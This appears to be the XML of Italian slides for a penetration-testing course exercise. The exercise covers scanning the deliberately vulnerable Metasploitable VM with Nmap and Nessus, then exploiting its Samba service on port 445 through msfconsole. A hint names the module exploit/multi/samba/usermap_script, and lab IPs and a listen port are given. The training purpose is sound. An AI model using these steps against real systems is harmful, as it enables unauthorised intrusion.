              <a:ext cx="3490660" cy="2323892"/>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3908993" y="5077050"/>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2051378" y="3236663"/>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0" r="0" b="-139600"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076046" y="4691551"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057145" y="6635288"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4893962" y="2152526"/>
            <a:ext cx="11787566" cy="606424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" spc="-507">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 4 - EXPLOIT METASPLOITABLE CON METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4312674" y="875982"/>
            <a:ext cx="12689927" cy="886461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="-728">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12466671" y="4691551"/>
            <a:ext cx="4094226" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4114800" w="4094226">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4094226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40942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2590327" y="950176"/>
            <a:ext cx="5511612" cy="738072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6043"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4317">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12080162" y="1531102"/>
            <a:ext cx="5511612" cy="440891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3523"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2517">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6990682" y="2076534"/>
            <a:ext cx="7803676" cy="5695782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>1 - LABORATORIO VIRTUALE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.1 - Configurazione Macchina Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.2 - Configurazione Macchina Metasplotable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.3 - Verifica Comunicazione Macchine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>2 - VULNERABILITY SCANNING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    2.1 - Scan con Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    2.2 -Basic Scan con Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>3 - FASE DI EXPLOIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.1 - Panoramica Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.2 - Sfruttamento Vulnerabilità Porta 445 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>4 - VERIFICA DELLA SESSIONE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="747409"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="4546672"/>
            <a:ext cx="15381560" cy="2506980"/>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1 - Configurazione </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Laboratorio </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Virtuale</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120324">
            <a:off x="11729827" y="2778474"/>
            <a:ext cx="10252476" cy="9509171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9509171" w="10252476">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10252476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10252476" y="9509171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9509171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="2296042" y="3741120"/>
            <a:ext cx="3925100" cy="7766485"/>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6" id="16"/>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7" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14690529" y="29602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8" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1453220" y="239020"/>
            <a:ext cx="14768151" cy="1779290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" spc="-546">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>EXPLOIT SU METASPLOTABLE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" spc="-546">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>CON METASPLOIT </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1107704" y="1974270"/>
            <a:ext cx="15381560" cy="688974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>TRACCIA - GIORNO 4 :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="757176" y="6619294"/>
            <a:ext cx="7384659" cy="1967230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Kali Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.50.100/24 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Metasploitable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.50.150/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Listen Port: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>5555</a:t>
            </a:r>
          </a:p>
        </p:txBody>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3" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="146358" y="2813159"/>
            <a:ext cx="17676615" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>È richiesto allo studente di: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Effettuare un Vulnerability Scanning (basic scan) con Nessus sulla macchina Metasploitable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Sfruttare la vulnerabilità del servizio attivo sulla porta 445 TCP utilizzando MSFConsole </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Eseguire il comando «ifconfig» una volta ottenuta la sessione per verificare l’indirizzo di rete della macchina vittima.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1107704" y="6124630"/>
            <a:ext cx="5642843" cy="596900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Requisiti laboratorio:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 25" id="25"/>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6" id="26"/>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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9617942" y="6640419"/>
            <a:ext cx="7384659" cy="2614930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Suggerimento:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1260"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Utilizzate l’exploit al path: exploit/multi/samba/usermap_script (fate prima la ricerca con la Keyword search)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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730615"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2753760" y="33924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18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1337170" y="882169"/>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1.1 - CONFIGURAZIONE KALI LINUX</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true" rot="0">
            <a:off x="8845815" y="1717230"/>
            <a:ext cx="2510721" cy="709279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="709279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="709279"/>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1" id="21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5709765">
            <a:off x="14599154" y="3891426"/>
            <a:ext cx="1827200" cy="1763248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11356536" y="1814896"/>
            <a:ext cx="3449799" cy="3328604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3328604" w="3449799">
                <a:moveTo>
